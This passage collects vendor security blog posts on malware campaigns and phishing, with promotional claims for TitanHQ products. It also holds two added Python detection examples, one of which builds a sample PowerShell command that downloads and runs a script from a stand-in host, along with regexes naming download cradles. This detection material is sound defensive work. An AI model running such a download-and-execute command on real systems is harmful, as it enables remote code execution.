and\r\nheuristics. 
These features allow SpamTitan to detect and block zero-day phishing threats and business email\r\ncompromise, which Microsoft struggles to detect and block.\r\nSpamTitan performs extensive checks of embedded hyperlinks to combat phishing, including checks of shortened\r\nURLs. Office 365 malware detection is greatly improved with dual antivirus engines for detecting known\r\nmalware and email sandboxing. The sandboxing feature includes machine learning and behavioral analysis for the\r\nsafe detonation of files in an isolated environment, and message sandboxing is vital for detecting and blocking the\r\nzero-day malware threats that EOP and Defender miss.\r\nSpamTitan cloud-based email filtering is also an ideal choice for Managed Services Providers looking to provide\r\ntheir customers with more advanced email security, especially for small- and medium-sized clients unwilling to\r\npay for E5 licenses. SpamTitan has been developed from the ground up to meet the needs of MSPs and manage\r\nemail security with minimal management overhead.\r\nTitanHQ can also offer MSPs additional protection against phishing with TitanHQ’s new anti-phishing solution,\r\nPhishTitan. PhishTitan uses a large language model (LLM) and AI to analyze emails to identify phishing attempts.\r\nThe solution incorporates multiple curated feeds to detect malicious URLs linked in phishing emails, adds banners\r\nto emails from external sources to warn end users about potential threats, and adds post-delivery remediation\r\nacross multiple tenants allowing phishing emails to be instantly removed from the email system with a single\r\nclick.\r\nThe best way to find out more about the full capabilities of SpamTitan and PhishTitan and how they work is to\r\ncall the TitanHQ team. 
A product demonstration can be arranged and you can take advantage of a free trial to see\r\nfor yourself the difference these solutions make and how they can significantly improve threat detection with\r\nOffice 365.\r\nNew Campaigns Use Trojanized Software Downloaders to Distribute Dangerous\r\nInformation Stealers\r\nby G Hunt | June 28, 2024 | Phishing \u0026 Email Spam\r\nTwo new malware distribution campaigns have been detected that deliver dangerous information-stealing\r\nmalware, both targeting individuals looking to download free and pirated software.\r\nTrojanized Cisco Webex Meetings App Delivers Malware Loader and\r\nInformation Stealer\r\nThe first campaign uses trojanized installers for free and pirated\r\nsoftware to deploy a malware loader called HijackLoader, which in turn delivers an information stealer. In the\r\nattacks, the victim was tricked into downloading a trojanized version of the Cisco Webex Meetings App, a video\r\nconferencing app. The user downloaded a password-protected archive (RAR) file, which contained a file called\r\nsetup.exe. When the victim executed the file, DLL sideloading was used to launch HijackLoader, which was\r\ninjected into a Windows binary.\r\nHijackLoader connects with its command-and-control server and downloads another binary, an information stealer\r\ncalled Vidar Stealer. The malware bypasses User Account Control (UAC), escalates privileges, and adds an\r\nexception to the Windows Defender exclusion list. Vidar Stealer is used to steal credentials from browsers and\r\ndeliver additional malware payloads, including a cryptocurrency miner. 
This campaign primarily targets\r\norganizations in Latin America and the Asia Pacific region.\r\nGoogle Ads Used to Target Mac Users and Deliver Poseidon Malware\r\nAn information stealer called Poseidon is being distributed via malicious Google Ads that claim to provide the\r\npopular Arc web browser. The campaign targets Mac users and delivers a trojanized version of the Arc browser\r\ninstaller. If the installer is launched, the user gets the browser but is also infected with the malware.\r\nAccording to an analysis from Malwarebytes, the new information stealer has similar features to the notorious\r\nAtomic Stealer, including a file grabber, crypto wallet extractor, and the ability to steal passwords from password\r\nmanagers such as Bitwarden and KeePassXC, passwords stored in browsers, and browser histories. The targeting\r\nof password managers makes this malware particularly dangerous, potentially allowing the theft of all passwords.\r\nThe researchers believe the malware has been set up as a rival to Atomic Stealer.\r\nHow to Protect Your Business\r\nProtecting against malware requires a defense-in-depth approach to security, where several different security\r\nsolutions provide multiple overlapping layers of protection. These security measures should include the following:\r\nAntivirus software – Antivirus software is a must. The software will be able to detect malware when it is\r\ndownloaded onto a device or is executed. The malware is identified by its signature, which means that a particular\r\nmalware variant must be known and its signature must be present in the malware definition list used by that\r\nsoftware. Antivirus software will not detect novel malware variants without behavioral analysis of files.\r\nWeb filter – One of the best defenses against malware distributed via the internet is a web filter. 
The web filter\r\nblocks downloads of malicious files by preventing downloads of executable files from the Internet, blocking\r\naccess to known malicious websites, and limiting the sites that users can visit on their corporate-owned devices.\r\nThe main advantage of a web filter is the threat is dealt with before any files are downloaded from the Internet.\r\nSecurity awareness training – Users should be warned about the risks of downloading software from the\r\nInternet, be taught how to identify the signs of phishing and malicious emails, and be trained on security best\r\npractices. The latter should include carefully checking the domain of the website offering software and making\r\nsure it is the official website of the software vendor or a reputable software distributor.\r\nEmail security solution – Malware is often delivered via email, usually via a malicious script in an attached file\r\nor via a linked web page. An email security solution needs to have antivirus capabilities – signature-based\r\ndetection and behavioral analysis in an email sandbox. The former will detect known malware variants and email\r\nsandboxing is used to detect novel malware variants. Your email security solutions should also include AI-based\r\ndetection, which can identify malicious messages based on how they differ from standard messages received by\r\nyour business and perform comparisons with previous malware distribution campaigns.\r\nWhile TitanHQ does not provide antivirus software, TitanHQ can help with web filtering (WebTitan), email\r\nsecurity (SpamTitan), phishing protection (PhishTitan), and security awareness training (SafeTitan). 
For more\r\ninformation on improving your defenses against malware and TitanHQ’s multi-award-winning cloud-based email\r\nsecurity and internet security solutions for businesses and managed service providers, give the TitanHQ team a\r\ncall today.\r\nOyster Backdoor Delivered Through Malvertising Campaign Offering Popular\r\nSoftware Solutions\r\nby G Hunt | June 26, 2024 | Website Filtering\r\nA malvertising campaign has been identified that targets users looking to download popular software such as\r\nGoogle Chrome and Microsoft Teams and delivers a backdoor malware called Oyster. The threat actor has\r\nregistered lookalike domains that offer the software to download; however, the installer delivers the backdoor,\r\nwith PowerShell used for persistence. After the malware is executed, the legitimate software is installed. Since the\r\nuser gets the software they are expecting, they are unlikely to realize that their device has been infected.\r\nThe Oyster backdoor has been linked to the Russian threat group behind the infamous TrickBot Trojan. Once\r\ninstalled, the malware connects with its command-and-control server, gathers information about the host, and\r\nallows the threat actors to remotely execute code on the infected device. According to researchers at Rapid7 who\r\nidentified the campaign, the threat actor has been observed delivering additional malware payloads on infected\r\ndevices.\r\nMalvertising is a common method of malware delivery that takes advantage of a lack of security awareness and\r\nattentiveness. Threat actors create adverts on legitimate ad networks for popular software solutions and pay to\r\nhave their ads appear when users search for the software solutions they are impersonating. 
Just because an advert\r\nappears at the top of the search engine listings on Google or Bing it does not mean that the advert is legitimate.\r\nClicking the link will direct the user to a site that is a carbon copy of the legitimate website that it spoofs, where\r\nthey can download the software installer. These campaigns can be identified by the domain, which should be\r\ncarefully checked to make sure it is the website of the official software provider.\r\nTyposquatting is also commonly used, where threat actors register almost identical domains to the company they\r\nare impersonating. The domains usually have a transposed or missing letter. If the domain is not carefully\r\nchecked, the user is unlikely to realize they are not on the official website. Threat actors use black hat search\r\nengine optimization techniques to get the websites to appear high up in the search engine listings.\r\nBy targeting software downloads, where the user is expecting to download an installer, the threat actor does not\r\nneed to convince the user to execute the malicious file. If they fail to identify the scam before downloading the\r\ninstaller, their device is highly likely to be infected. Security awareness training should cover the methods used by\r\nthreat actors to distribute malware over the Internet and should condition employees to always carefully check the\r\ndomain to make sure it is the legitimate vendor’s website. Rather than develop a security awareness training\r\nprogram from scratch, businesses should consider using a vendor that can provide a comprehensive training\r\nplatform that is constantly updated with new training content covering new attack methods and scams. 
A security\r\nawareness training program should run continuously, to build awareness, teach security best practices, and ensure\r\nthat employees are constantly reminded of the importance of security.\r\nIn addition to training, technical measures should be implemented. A web filter should be used to prevent access\r\nto known malicious web pages and block downloads of executable files from the Internet, with policies\r\nimplemented that require any software to be provided through or by the IT team. TitanHQ can help to improve\r\nyour defenses against malware with a suite of cybersecurity solutions, including the SafeTitan security awareness\r\ntraining and phishing simulation platform, the WebTitan web filter to prevent access to malicious websites,\r\nSpamTitan email security with sandboxing to block malicious emails, and PhishTitan to improve phishing\r\ndetection and remediation for businesses that use Microsoft 365.\r\nFor more information about these and other cybersecurity solutions from TitanHQ, give the sales team a call. All\r\nTitanHQ SaaS solutions are available on a free trial to allow you to test them in your own environment before\r\nmaking a purchase decision, with customer support provided throughout the trial.\r\nDevastating Healthcare Cyberattack Started with a Malicious File Download from\r\nthe Internet\r\nby G Hunt | June 19, 2024 | Internet Security\r\nAscension, one of the largest private healthcare systems in the United States, fell victim to a ransomware attack on\r\nMay 8, 2024, that forced systems offline, including patients’ medical records which were not fully restored for a\r\nmonth. 
The attack caused massive disruption, and without access to electronic health records, staff were forced to\r\nrecord patient information manually.\r\nPatient care was seriously affected, with delays in diagnosis and treatment, and the lack of access to medical\r\nrecords resulted in medical errors. Without technology to perform routine safety checks, patient safety was put at\r\nrisk. The investigation into the attack is still ongoing, but evidence has already been found that files containing\r\nsensitive data were stolen in the attack. The scale of the data breach has yet to be determined but for a healthcare\r\nsystem as large as Ascension, the breach could be considerable.\r\nThe ransomware attack occurred as a result of a simple error by a single employee, who was tricked into\r\ndownloading a malicious file from the internet. That file provided the attackers with a foothold in the network,\r\nfrom where they were able to launch a devastating ransomware attack. Ascension said it has no reason to believe\r\nthat the file download was a malicious act and is satisfied that it was an honest mistake by the employee. Sadly, it\r\nis the type of mistake that frequently results in ransomware attacks and costly data breaches.\r\nAscension has not disclosed how the file was downloaded, whether it was from general web browsing,\r\nmalvertising that directed the employee to a malicious website, or if they clicked a link in a phishing email.\r\nRegardless of how the employee arrived at the malicious site, the attack could have been prevented with the right\r\ntechnology in place. It is possible to protect against all of the above-mentioned methods of malware delivery with\r\na web filter. 
WebTitan from TitanHQ is a DNS-based web filter for businesses to prevent employees from visiting\r\nwebsites hosting malware and to block the web-based component of phishing attacks.\r\nWebTitan is fed threat intelligence to provide real-time protection against malicious websites. As soon as a\r\nmalicious website is detected, it is added to the database and all WebTitan users are prevented from visiting that\r\nURL. WebTitan categorizes and blocks around 60,000 malware and spyware domains each day and if an attempt\r\nis made to visit one of those URLs, whether it is via a link in an email, malvertising, or general web browsing, the\r\nattempt is blocked and the user is directed to a locally hosted block page.\r\nWebTitan is updated constantly with vast click stream traffic from actively visited URLs from 500 million end\r\nusers, and the data is used to categorize websites. WebTitan users can then place restrictions on 53 categories of\r\nwebsites that employees can visit on their work devices, eliminating risks from common sources of malware such\r\nas torrent and file-sharing sites for which there is no business reason for access. Further, as an additional\r\nprotection against malware, WebTitan can be configured to block downloads of certain file types from the internet,\r\nsuch as executable files that are commonly used to deliver malware. For the majority of employees, there is rarely\r\na business need to download executable files.\r\nMalware is commonly delivered via email, either via attachments containing malicious scripts and macros or via\r\nembedded hyperlinks. It is important to have an advanced email security solution in place to block this method of\r\nmalware delivery. 
SpamTitan is a cloud-based anti-spam service that protects against known malware using twin\r\nantivirus engines that scan attachments for the signatures of malware. To protect against novel malware threats,\r\nSpamTitan incorporates a Bitdefender-powered email sandbox, where suspicious messages are sent for deep\r\ninspection. An email sandbox is key to blocking malware threats and essential due to the volume of novel malware\r\nvariants now being distributed.\r\nWhile technological solutions are essential, it is also important to provide security awareness training to the\r\nworkforce to improve awareness of cyber threats and teach security best practices. This is another area where\r\nTitanHQ can help. SafeTitan is a comprehensive security awareness training platform and phishing simulator that\r\nis proven to reduce susceptibility to phishing attacks and helps businesses develop a human firewall and combat\r\nthe many threats that target employees.\r\nFor more information on improving your defenses against malware and phishing threats, give the TitanHQ team a\r\ncall. All TitanHQ cybersecurity solutions are also available on a free trial to allow you to put them to the test\r\nbefore making a purchase decision.\r\nTorrent Sites Used to Deliver Dangerous Malware Packaged with Pirated Software\r\nby G Hunt | May 31, 2024 | Internet Security\r\nDownloading unofficial and pirated software from the Internet carries a significant risk of malware infections.\r\nMalware is often packaged with the installers or with the cracks/key generators that provide the serial keys or\r\ncodes to activate the software.\r\nCybercriminals use a variety of methods for driving traffic to their malicious websites, including malicious\r\nGoogle Ads, adverts on other third-party ad networks, SEO poisoning to get their malicious sites appearing high in\r\nthe search engine listings, and via torrent and warez sites. 
A warning has recently been issued about the latter by\r\nAhnLab Security Intelligence Center (ASEC).\r\nThe campaign identified by the researchers distributes pirated copies of Microsoft Office, Microsoft Windows, and the Hangul\r\nWord Processor. The pirated software is available through torrent sites and includes a professional-looking\r\ninstaller. The installer for Microsoft Office allows users to select the Office products they want to install in either\r\nthe 32-bit or 64-bit version and select the language.\r\nIf the installer is run, the user will get the software they are looking for; however, in the background, a malware\r\ncocktail will be installed. The threat actor behind this campaign is distributing several different malware payloads,\r\nincluding coinminers, remote access trojans (RATs), downloaders, and anti-AV malware.\r\nWhen the installer is run, an obfuscated .NET downloader is executed which connects to the attacker’s\r\nTelegram/Mastodon channels and obtains a Google Drive or GitHub URL from where Base64 encrypted strings\r\nare obtained. Those strings are decrypted on the device and are PowerShell commands. Task Scheduler is used to\r\nexecute the PowerShell commands, which install the malware. The scheduled tasks also allow the threat actor to\r\nconsistently install other malware variants on the infected device.\r\nBy using Task Scheduler, the threat actor can reinstall malware if it is detected and removed, and since an updater\r\nis installed, the PowerShell commands can change. Even if the initial URLs are blocked, others will be added to\r\nensure malware can still be delivered.\r\nInitially, the threat actor was installing the updater together with either the Orcus RAT or the XMRig\r\ncryptocurrency miner. 
Orcus RAT provides the threat actor with remote control of an infected device, and has\r\nkeylogging capabilities, can take screenshots, access the webcam, and exfiltrate data. XMRig is configured to only\r\nrun when it is unlikely to be detected and will quit when system resource usage is high.\r\nIn the latest campaign, the threat actor also installs 3Proxy, which allows abuse of the infected device as a proxy,\r\nPureCrypter for downloading and executing additional malware payloads, and AntiAV malware, which disables\r\nantivirus and other security software by modifying the configuration files.\r\nWhile this campaign appears to be targeting users in South Korea, it clearly shows the risks of downloading\r\npirated software. Due to the inclusion of the updater and the installation of PureCrypter, remediation is difficult.\r\nFurther, new malware variants are being distributed every week to evade detection.\r\nEmployees often download software to make it easier for them to do their jobs, and Torrent sites are a common\r\nsource of unauthorized software. Businesses should therefore implement policies that prohibit employees from\r\ndownloading software that has not been authorized by the IT department and should also implement controls to\r\nprevent Torrent and other software distribution sites from being accessed.\r\nWith TitanHQ’s WebTitan DNS filter, blocking access to malicious and risky websites could not be simpler.\r\nSimply install the cloud-based web filter and configure the solution by using the checkboxes in the user interface\r\nto block access to these categories of websites. 
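As an added illustration (this is not TitanHQ or ASEC code), the Python below checks process-creation events for the persistence pattern described above: PowerShell started by the Task Scheduler host with an encoded, download-and-execute command line. The events are constructed samples modelled on Sysmon-style ParentImage/Image/CommandLine fields, and the regular expressions and the decision rule are my assumptions about what a sensible detection would look like, not a rule taken from any product.

```python
import base64
import re

# Added example, not TitanHQ or ASEC code: flag PowerShell processes that were
# started by the Task Scheduler host with an encoded, download-and-execute
# command line, the persistence pattern described for the pirated-software
# installers. SAMPLE_EVENTS are CONSTRUCTED records modelled on the ParentImage /
# Image / CommandLine fields of a process-creation event (e.g. Sysmon Event ID 1).

# -e, -ec, -enc and -EncodedCommand all take a Base64 blob in PowerShell.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Typical download cradles and in-memory execution helpers.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|"
    r"\biex\b|Net\.WebClient|FromBase64String|Start-BitsTransfer",
    re.I,
)

# Scheduled tasks run as children of the Schedule service host (svchost.exe on
# current Windows, taskeng.exe on older releases).
TASK_HOST = re.compile(r"\\(?:svchost|taskeng)\.exe$", re.I)

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def encode_ps(command: str) -> str:
    """UTF-16LE then Base64: the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_events(events):
    """Return findings for PowerShell launches that combine a payload signal
    (encoded command or download cradle) with a context signal (task-host
    parent or hidden window)."""
    findings = []
    for index, ev in enumerate(events):
        if not ev["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        reasons = []
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is not None:
            reasons.append("encoded-command")
        # Inspect the decoded script if there is one, else the raw command line.
        if CRADLE.search(decoded if decoded is not None else ev["CommandLine"]):
            reasons.append("download-cradle")
        if TASK_HOST.search(ev["ParentImage"]):
            reasons.append("launched-by-task-host")
        if HIDDEN_WINDOW.search(ev["CommandLine"]):
            reasons.append("hidden-window")
        payload_signal = "encoded-command" in reasons or "download-cradle" in reasons
        context_signal = "launched-by-task-host" in reasons or "hidden-window" in reasons
        if payload_signal and context_signal:
            findings.append({"index": index, "reasons": reasons, "decoded": decoded})
    return findings


SAMPLE_EVENTS = [
    {   # benign: an administrator runs a script from an interactive desktop session
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
    {   # suspicious: task host starts a hidden PowerShell with an encoded cradle
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
            "IEX (New-Object Net.WebClient).DownloadString('https://updater.example.invalid/s')"
        ),
    },
    {   # benign: a scheduled maintenance task with a readable, file-based command
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\ProgramData\backup\nightly.ps1",
    },
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"event {f['index']}: {', '.join(f['reasons'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Only the second sample event is reported: it is the only one that pairs a payload signal with a context signal. The third event shows why the rule needs both: a scheduled task running a readable script from disk is ordinary administration, and flagging every PowerShell child of the task host would bury the real finding in noise. Decoding the Base64 before matching matters because the cradle text never appears in the raw command line.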
WebTitan is constantly updated with the latest threat intelligence to\r\nblock access to known malicious websites, and it is also possible to block downloads of executable files from the\r\nInternet.\r\nFor more information on improving Internet security with a DNS-based web filter, give the TitanHQ team a call.\r\nWebTitan, like all other TitanHQ products, is available on a free trial, with product support provided to ensure you\r\nget the most out of the solution during the trial.\r\nDiscord Phishing Risk Increases with 50,000+ Malicious Links Detected in 6\r\nMonths\r\nby G Hunt | May 30, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nPhishing tactics are constantly changing and while email is still one of the most common ways of getting\r\nmalicious content in front of end users, other forms of phishing are growing. Smishing (SMS phishing) has\r\nincreased considerably in recent years, and vishing (voice phishing) is also common, especially for IT support\r\nscams.\r\nAnother method of malware delivery that has seen an enormous increase recently is the use of the instant messaging\r\nand VoIP social platform Discord. Discord is a platform that has long been popular with gamers, due to being able\r\nto create a server with voice and text for no extra cost, both of which are necessary for team speak in gaming.\r\nWhile gamers still account for a majority of users, usage for non-gaming purposes is growing.\r\nThe platform is also proving popular with cybercriminals who are using it for phishing campaigns and malware\r\ndistribution. According to Bitdefender, the antivirus company whose technology powers the SpamTitan email\r\nsandboxing feature, more than 50,000 malicious links have been detected on Discord in the past 6 months. 
Around\r\na year ago, a campaign was detected that used Discord to send links to a malicious site resulting in the delivery of\r\nPureCrypter malware – a fully featured malware loader that is used for distributing information stealers and\r\nremote access trojans.\r\nDiscord responded to the misuse of the platform and implemented changes such as adding a 24-hour expiry for\r\nlinks to internally hosted files, which made it harder for malicious actors to use the platform for hosting malware.\r\nWhile this move has hampered cybercriminals, the platform is still being used for malware distribution. One of the\r\nlatest malicious Discord campaigns is concerned with obtaining credentials and financial information rather than\r\ndistributing malware.\r\nThe campaign involves sending links that offer users a free Discord Nitro subscription. Discord Nitro provides\r\nusers with perks that are locked for other users, such as being able to use custom emojis anywhere, set custom\r\nvideo backgrounds, HD video streaming, bigger file uploads, and more. Discord Nitro costs $9.99 a month, so a\r\nfree account is attractive.\r\nIf the user clicks the link in the message, they are directed to a fake Discord website where they are tricked into\r\ndisclosing credentials and financial information. Other Discord Nitro lures have also been detected along the same\r\ntheme, offering advice on how to qualify for a free Discord Nitro subscription by linking to other accounts such as\r\nSteam. 
According to Bitdefender, 28% of detected malicious uses are spam threats, 27% are untrusted, around\r\n20% are phishing attempts and a similar percentage involve malware distribution.\r\nAny platform that allows direct communication with users can be used for phishing and other malicious purposes.\r\nSecurity awareness training should cover all of these attack vectors and should get the message across to end users\r\nthat they always need to be on their guard whether they are on email, SMS, instant messaging services, or the\r\nphone. By running training courses continuously throughout the year, businesses can develop a security culture by\r\ntraining their employees to be constantly on the lookout for phishing and malware threats and developing the\r\nskills that allow them to identify threats.\r\nDeveloping, automating, and updating training courses to include information on the latest threats, tactics,\r\ntechniques, and procedures used by threat actors is easy with the SafeTitan security awareness training platform.\r\nSafeTitan makes training fun and engaging for end users and the platform has been shown to reduce susceptibility\r\nto phishing and malware threats by up to 80%.\r\nIf you are not currently running a comprehensive security awareness training program for your workforce, or if\r\nyou are looking to improve your training, give the TitanHQ team a call and ask about SafeTitan. 
SafeTitan is one\r\nproduct in a suite of cloud-based security solutions for businesses and managed service providers, which includes\r\nan enterprise spam filter, a malicious file sandbox for email, a DNS-based web filter, email encryption, email\r\narchiving, and phishing protection for M365.\r\nHow to Protect Against Advanced Email and SMS Phishing Threats\r\nby G Hunt | May 27, 2024 | Phishing \u0026 Email Spam, Security Awareness, Spam Advice\r\nEmail phishing is the most common form of phishing, with email providing threat actors with an easy way of\r\ngetting their malicious messages in front of employees. Phishing emails typically include a URL along with a\r\npressing reason for clicking the link. The URLs are often masked to make them appear legitimate, either with a\r\nbutton or link text relevant to the lure in the message. Email attachments are often added to emails that contain\r\nmalicious scripts for downloading a variety of malicious payloads, or links to websites where malware is hosted.\r\nWhile there are many email security solutions available to businesses, many lack the sophistication to block\r\nadvanced phishing threats as they rely on threat intelligence, antivirus software, and reputation checks. While\r\nthese are important and effective at blocking the bulk of phishing and malspam emails, they are not effective at\r\nblocking zero-day attacks, business email compromise, and advanced phishing threats.\r\nMore advanced features include email sandboxing for detecting and quarantining zero-day malware threats and\r\nmalicious scripts, greylisting for increasing the spam catch rate, and AI and machine learning capabilities that can\r\nassess messages and identify threats based on how they differ from the messages that are typically received by the\r\nbusiness. SpamTitan, a cloud-based anti-spam service from TitanHQ, has these features and more. 
Independent\r\ntests have shown that the solution blocks more than 99.99% of spam emails, 99.95% of malware, and more than\r\n99.91% of phishing emails. SpamTitan can be provided as a hosted email filter or as a gateway spam filter for\r\ninstallation on-premises on existing hardware, serving as a virtual anti-spam appliance.\r\nMicrosoft 365 users often complain about the phishing catch rate of the protections provided by Microsoft, which\r\nare EOP only for most licenses and EOP and Defender for the most expensive licenses. While these protections\r\nare effective at blocking spam and known malware, they fall short of what is required for blocking advanced\r\nthreats. To improve Microsoft 365 security and block the threats that Microsoft misses, TitanHQ has developed\r\nPhishTitan. PhishTitan augments Microsoft 365 defenses and is the easiest way of improving the Office 365 spam\r\nfilter. These advanced defenses are now vital due to the increase in attacks. The Anti-Phishing Working Group\r\n(APWG) has reported that more phishing attacks were conducted in 2023 than ever before.\r\nMassive Increase in Text Message Phishing Scams\r\nBlocking email phishing attempts is straightforward with advanced email security solutions, which make it much\r\nharder for phishers to get their messages in front of employees. One of the ways that threat actors have adapted is\r\nby switching to SMS phishing attacks, which no email security solution can block. APWG has reported a major\r\nincrease in SMS-based phishing attempts.\r\nA recent study attempted to determine the extent to which SMS phishing is being used. Researchers used SMS\r\ngateways – websites that allow users to obtain disposable phone numbers – to obtain a large number of phone\r\nnumbers for the study. 
They then waited to see how long it took for SMS phishing messages to be received. The\r\nstudy involved 2,011 phone numbers and over 396 days the researchers received an astonishing 67,991 SMS\r\nphishing messages, which averages almost 34 per number. The researchers analyzed the messages and identified\r\n35,128 unique campaigns that they associated with 600 phishing operations. Several of the threat actors had even\r\nset up URL shortening services on their own domains to hide the destination URLs. With these shortening\r\nservices, the only way to tell that the domain is malicious is to click the link.\r\nBlocking SMS phishing threats is difficult for businesses and the primary defense is security awareness training.\r\nSMS phishing should be included in security awareness training to make employees aware of the threat, as it is\r\nhighly likely that they will encounter many SMS phishing threats. The SafeTitan security awareness platform\r\nmakes creating training courses simple and the platform includes training content on all types of threats, including\r\nSMS, voice, and email phishing. With SafeTitan it is easy to create and automate campaigns, as well as deliver\r\ntraining in real-time in response to employee errors to ensure training is provided when it is likely to have the\r\ngreatest impact – immediately after a mistake is made.\r\nSophisticated Phishing Campaign Abuses Cloudflare Workers\r\nby G Hunt | May 26, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nCloudflare Workers is being abused in phishing campaigns to obtain credentials for Microsoft, Gmail, Yahoo!, and\r\ncPanel Webmail. 
The campaigns identified in the past month have mostly targeted individuals in Asia, North\r\nAmerica, and Southern Europe, with the majority of attacks conducted on organizations in the technology,\r\nfinance, and banking sectors.\r\nCloudflare Workers is part of the Cloudflare Developer Platform and allows code to be deployed and run from\r\nCloudflare’s global network. It is used to build web functions and applications without having to maintain\r\ninfrastructure. The campaigns were identified by researchers at Netskope Threat Labs. One campaign uses a\r\ntechnique called HTML smuggling, which involves abusing HTML5 and JavaScript features to inject and extract\r\ndata across network boundaries. This is a client-side attack where the malicious activities occur within the user’s\r\nbrowser. HTML smuggling is most commonly associated with malware and is used to bypass network controls by\r\nassembling malicious payloads on the client side. In this case, the malicious payload is a phishing page.\r\nThe phishing page is reconstructed in the user’s browser, and they are prompted to log in to the account for which\r\nthe attacker seeks credentials, such as their Microsoft account. When the victim enters their credentials, they will\r\nbe logged in to the legitimate website and the attacker will then collect the tokens and session cookies.\r\nAnother campaign uses adversary-in-the-middle (AitM) tactics to capture login credentials, cookies, and tokens,\r\nand allow the attackers to compromise accounts that are protected with multi-factor authentication. Cloudflare\r\nWorkers is used as a reverse proxy server for the legitimate login page for the credentials being targeted. Traffic\r\nbetween the victim and the login page is intercepted to capture credentials as well as MFA codes and session\r\ncookies. 
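The reverse-proxy set-up just described still leaves one observable in the email itself: the link the victim is asked to click, which sits on the attacker's Workers hostname rather than the brand's own domain. The Python below, added here as an example rather than TitanHQ or Netskope code, extracts the links from a constructed HTML message body and flags those that point at a *.workers.dev host or whose visible text names a brand that does not own the real destination. The suffix list, the brand-to-domain table and the sample message are all assumed values I constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added example, not TitanHQ or Netskope code: inspect the links in an HTML email
# body and flag login links that sit on a serverless hosting domain or whose
# visible text names a brand that does not own the link's real host. The suffix
# and brand lists are an assumed policy; SAMPLE_BODY is a CONSTRUCTED message.
PROXY_HOST_SUFFIXES = (".workers.dev",)
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "microsoftonline.com", "live.com", "office.com"},
    "gmail": {"google.com", "gmail.com"},
    "yahoo": {"yahoo.com"},
}


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def registered_domain(host: str) -> str:
    """Last two labels of a hostname. Good enough for the sample; a production
    filter would consult the Public Suffix List for co.uk-style domains."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_link(href: str, text: str):
    """Return the list of reasons a link looks like a credential-phishing link."""
    reasons = []
    host = (urlparse(href).hostname or "").lower()
    if not host:
        return reasons
    if host.endswith(PROXY_HOST_SUFFIXES):
        reasons.append("serverless-host")
    lowered = text.lower()
    for brand, owned in BRAND_DOMAINS.items():
        if brand in lowered and registered_domain(host) not in owned:
            reasons.append(f"brand-mismatch:{brand}")
    # Link text that shows one URL while the href goes somewhere else.
    shown = re.search(r"https?://([^/\s]+)", text, re.I)
    if shown and registered_domain(shown.group(1)) != registered_domain(host):
        reasons.append("display-url-mismatch")
    return reasons


def scan_html(body: str):
    """Run check_link over every anchor in an HTML body; return only the hits."""
    collector = LinkCollector()
    collector.feed(body)
    results = []
    for href, text in collector.links:
        reasons = check_link(href, text)
        if reasons:
            results.append({"href": href, "text": text, "reasons": reasons})
    return results


SAMPLE_BODY = """
<p>Your mailbox is almost full.
   <a href="https://login.microsoftonline.com/">Sign in to Microsoft 365</a> to review.</p>
<p><a href="https://mail-check.example-account.workers.dev/login">Verify your Microsoft account</a></p>
<p><a href="https://account-recovery.example.invalid/yahoo">https://login.yahoo.com/</a></p>
<p><a href="https://www.example.invalid/unsubscribe">Unsubscribe</a></p>
"""

if __name__ == "__main__":
    for r in scan_html(SAMPLE_BODY):
        print(r["href"], "->", ", ".join(r["reasons"]))
```

The genuine Microsoft link passes because its registered domain is in the brand's owned set, while the Workers-hosted link is reported both for its hosting suffix and for the brand mismatch. The third link illustrates the masking the post on advanced phishing describes: the visible text is a Yahoo URL, the href is not. A suffix list alone is a weak signal, since legitimate services are also deployed on Workers, which is why the brand and display-URL checks are combined with it.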
